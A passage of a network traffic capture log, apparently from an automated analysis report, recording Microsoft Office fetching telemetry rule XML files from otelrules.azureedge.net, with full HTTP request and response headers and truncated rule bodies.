                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:39 UTC  517                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:39 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1390
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 157887d5-b01e-0084-44d2-2cd736000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142539Z-16547b76f7fx6rhxhC1DFW76kg0000000kng00000000mq83
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:39 UTC  1390               IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


Session ID  Source IP    Source Port  Destination IP  Destination Port
104         192.168.2.5  49812        13.107.246.45   443
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:39 UTC  192                OUT        GET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:39 UTC  494                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:39 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1427
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 384ed142-801e-0047-1f8c-327265000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142539Z-16547b76f7f4k79zhC1DFWu9y00000000kr000000000kenc
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:39 UTC  1427               IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


Session ID  Source IP    Source Port  Destination IP  Destination Port
105         192.168.2.5  49814        13.107.246.45   443
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:39 UTC  192                OUT        GET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:39 UTC  494                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:39 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
ETag: "0x8DC582BE2A9D541"
x-ms-request-id: bad46039-901e-002a-55a8-347a27000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142539Z-r178fb8d7655k45rhC1DFWpsgg00000002g000000000gh53
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:39 UTC | 1401 | IN
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


Session ID | Source IP | Source Port | Destination IP | Destination Port
106 | 192.168.2.5 | 49816 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:39 UTC | 192 | OUT | GET /rules/rule702801v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:40 UTC | 515 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:39 GMT
Content-Type: text/xml
Content-Length: 1391
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
ETag: "0x8DC582BDF58DC7E"
x-ms-request-id: e59c32fc-b01e-005c-5110-364c66000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142539Z-r178fb8d765z9wvrhC1DFW1a0s00000000s000000000cegc
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:40 UTC | 1391 | IN
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


Session ID | Source IP | Source Port | Destination IP | Destination Port
107 | 192.168.2.5 | 49817 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:39 UTC | 192 | OUT | GET /rules/rule702800v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:40 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:40 GMT
Content-Type: text/xml
Content-Length: 1354
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
ETag: "0x8DC582BE0662D7C"
x-ms-request-id: 792e95e0-001e-0065-4da8-340b73000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142540Z-r178fb8d7654njfdhC1DFWd04800000002h000000000f4az
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:40 UTC | 1354 | IN
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


Session ID | Source IP | Source Port | Destination IP | Destination Port
108 | 192.168.2.5 | 49818 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:40 UTC | 192 | OUT | GET /rules/rule703351v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:40 UTC | 538 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:40 GMT
Content-Type: text/xml
Content-Length: 1403
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
ETag: "0x8DC582BDCDD6400"
x-ms-request-id: 4df37937-b01e-003d-35ab-2bd32c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142540Z-16547b76f7fp6mhthC1DFWrggn0000000kz0000000001ex2
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:40 UTC | 1403 | IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session ID | Source IP | Source Port | Destination IP | Destination Port
109 | 192.168.2.5 | 49815 | 13.107.246.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:40 UTC | 192 | OUT | GET /rules/rule701500v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:40 UTC | 538 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:40 GMT
Content-Type: text/xml
Content-Length: 1364
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
ETag: "0x8DC582BEB6AD293"
x-ms-request-id: 3018dbe1-101e-008d-70d2-2c92e5000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142540Z-16547b76f7f76p6chC1DFWctqw0000000ktg00000000gf52
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:40 UTC | 1364 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
110 | 192.168.2.5 | 49819 | 13.107.246.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:40 UTC | 192 | OUT | GET /rules/rule703350v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:40 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:40 GMT
Content-Type: text/xml
Content-Length: 1366
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
ETag: "0x8DC582BDF1E2608"
x-ms-request-id: 510f214b-601e-0050-22a5-342c9c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142540Z-1749fc9bdbd9f5rdhC1DFWbers00000002vg000000000bxw
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:40 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


Session ID | Source IP | Source Port | Destination IP | Destination Port
111 | 192.168.2.5 | 49820 | 13.107.246.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:40 UTC | 192 | OUT | GET /rules/rule703501v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:40 UTC | 538 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:40 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
ETag: "0x8DC582BE8C605FF"
x-ms-request-id: 5b14ddc3-301e-0033-2bd2-2cfa9c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142540Z-16547b76f7fcjqqhhC1DFWrrrc0000000kng00000000kaw2
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:40 UTC | 1399 | IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


Session ID: 112
Source IP: 192.168.2.5
Source Port: 49821
Destination IP: 13.107.246.45
Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:40 UTC | 192 | OUT | GET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:41 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:40 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 9890a075-d01e-002b-06d2-2c25fb000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142540Z-16547b76f7fr4g8xhC1DFW9cqc0000000hzg000000008p3t
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:41 UTC | 1362 | IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


Session ID: 113
Source IP: 192.168.2.5
Source Port: 49822
Destination IP: 13.107.246.45
Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:40 UTC | 192 | OUT | GET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:41 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:41 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: e1b64052-701e-003e-45a3-3479b3000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142541Z-r178fb8d765mjvjchC1DFWhkyn00000002n0000000000sd4
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:41 UTC | 1403 | IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session ID: 114
Source IP: 192.168.2.5
Source Port: 49823
Destination IP: 13.107.246.45
Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:41 UTC | 192 | OUT | GET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:41 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:41 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1366
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
ETag: "0x8DC582BEA414B16"
x-ms-request-id: 59bb3ce9-601e-0097-63c3-2bf33a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142541Z-16547b76f7f8dwtrhC1DFWd1zn0000000kyg0000000032b3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:41 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


Session ID | Source IP | Source Port | Destination IP | Destination Port
115 | 192.168.2.5 | 49824 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:41 UTC | 192 | OUT | GET /rules/rule701051v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:41 UTC | 538 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:41 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
ETag: "0x8DC582BE1CC18CD"
x-ms-request-id: 4847cb37-401e-0016-7fd2-2c53e0000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142541Z-16547b76f7fdtmzhhC1DFW6zhc00000007mg00000000ec55
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:41 UTC | 1399 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


Session ID | Source IP | Source Port | Destination IP | Destination Port
116 | 192.168.2.5 | 49825 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:41 UTC | 192 | OUT | GET /rules/rule701050v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:41 UTC | 538 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:41 GMT
Content-Type: text/xml
Content-Length: 1362
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
ETag: "0x8DC582BEB256F43"
x-ms-request-id: fadf1528-a01e-001e-72d2-2c49ef000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142541Z-16547b76f7fr4g8xhC1DFW9cqc0000000hu000000000pruu
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:41 UTC | 1362 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
117 | 192.168.2.5 | 49826 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:41 UTC | 192 | OUT | GET /rules/rule702751v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:41 UTC | 517 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:41 GMT
Content-Type: text/xml
Content-Length: 1403
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
ETag: "0x8DC582BEB866CDB"
x-ms-request-id: 1deecc73-401e-0029-32d2-2c9b43000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142541Z-16547b76f7fcjqqhhC1DFWrrrc0000000kng00000000kay5
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:41 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session ID | Source IP | Source Port | Destination IP | Destination Port
118 | 192.168.2.5 | 49827 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:41 UTC | 192 | OUT | GET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:42 UTC | 515 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:41 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: e1e647d4-d01e-0028-2386-367896000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142541Z-r178fb8d7656shmjhC1DFWu5kw00000002rg000000004s76
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:42 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


Session ID | Source IP | Source Port | Destination IP | Destination Port
119 | 192.168.2.5 | 49828 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:42 UTC | 192 | OUT | GET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:42 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:42 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 898deafb-901e-0048-35d2-2cb800000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142542Z-16547b76f7fkcrm9hC1DFWxdag0000000ky00000000058rd
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:42 UTC | 1399 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


Session ID | Source IP | Source Port | Destination IP | Destination Port
